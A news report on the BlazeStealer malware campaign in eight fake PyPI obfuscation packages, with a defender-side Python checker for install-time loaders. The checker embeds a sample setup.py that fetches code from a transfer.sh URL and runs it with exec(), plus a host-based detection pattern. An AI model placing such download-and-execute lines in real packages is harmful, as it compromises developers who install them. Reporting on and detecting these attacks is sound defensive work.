Hacker detects BlazeStealer malware in PyPI platform

Checkmarx analysts discovered a new batch of malicious packages in the Python Package Index (PyPI) containing the BlazeStealer malware, which gave attackers complete control over the victim’s computer.

All malicious packages were disguised as seemingly harmless obfuscation tools. In total, this campaign, which began back in January 2023, included eight packages: Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse and pyobfgood, the last of which was published in October.


“It is logical to assume that developers engaged in code obfuscation are most likely dealing with valuable and confidential information, which means that for hackers they are targets worth attacking,” experts note.

The majority of downloads for the packages listed came from the US, followed by China, Russia, Ireland, Hong Kong, Croatia, France and Spain. They have been downloaded a total of 2438 times and have now been removed from PyPI.

All of these libraries carried the BlazeStealer malware in their setup.py and __init__.py files, which fetched a malicious Python script hosted on Transfer(.)sh and ran it immediately after installation. As a result, a Discord bot was launched on the victim’s machine, giving the attackers complete control over the victim’s system.
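A defender-side check for the install-time loader pattern described above, added here as an example and not code from the article, from Checkmarx or from the packages themselves: it parses a setup.py with Python's ast module and flags the combination of a network fetch, a reference to transfer.sh and dynamic execution. Both setup.py strings are constructed for this example.

```python
import ast

# Constructed sample in the style the article describes: a download at
# install time followed by exec() of the body. Not code from any real package.
SUSPICIOUS_SETUP = '''
from setuptools import setup
import urllib.request
code = urllib.request.urlopen("https://transfer.sh/EXAMPLE/loader.py").read()
exec(code)
setup(name="pyobfexample", version="1.0")
'''

# Constructed benign setup.py for comparison.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="clean-package", version="0.1", packages=find_packages())
'''

# Call names that signal dynamic execution or install-time downloads,
# and hosts worth calling out explicitly (assumed list, extend as needed).
DYNAMIC_EXEC = {"exec", "eval", "compile"}
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post", "request"}
SUSPECT_HOSTS = ("transfer.sh",)

def audit_setup_source(source: str) -> list[str]:
    """Return human-readable findings for a setup.py / __init__.py source string."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            func = node.func
            # Handle both bare names (exec) and attribute calls (urllib.request.urlopen)
            name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
            if name in DYNAMIC_EXEC:
                findings.append(f"dynamic execution via {name}() at line {node.lineno}")
            elif name in NETWORK_CALLS:
                findings.append(f"network call {name}() at line {node.lineno}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for host in SUSPECT_HOSTS:
                if host in node.value:
                    findings.append(f"reference to {host} at line {node.lineno}")
    return findings

def is_suspicious(source: str) -> bool:
    """Flag only when the file both reaches the network and executes dynamically."""
    findings = audit_setup_source(source)
    has_exec = any(f.startswith("dynamic execution") for f in findings)
    has_net = any(f.startswith(("network call", "reference to")) for f in findings)
    return has_exec and has_net

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, is_suspicious(src), audit_setup_source(src))
```

Run it against the extracted sdist of a package before `pip install`, since the pattern it looks for only matters when it executes at install time.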

This bot allowed the attackers to collect a wide range of information about the infected host, including browser passwords and screenshots, execute arbitrary commands, encrypt files, and disable Microsoft Defender. All collected data was sent to a Discord channel, leaving virtually no traces of presence on the system.

In addition, the bot is capable of rendering the computer unusable by driving up CPU load, placing a batch script in the startup folder that shuts the machine down, and triggering a “blue screen of death” (BSoD). All of this is accompanied by mocking messages from the hackers.


“The open-source space remains fertile ground for innovation, but requires caution. Developers must remain vigilant and check packages before using them,” the experts summarize.
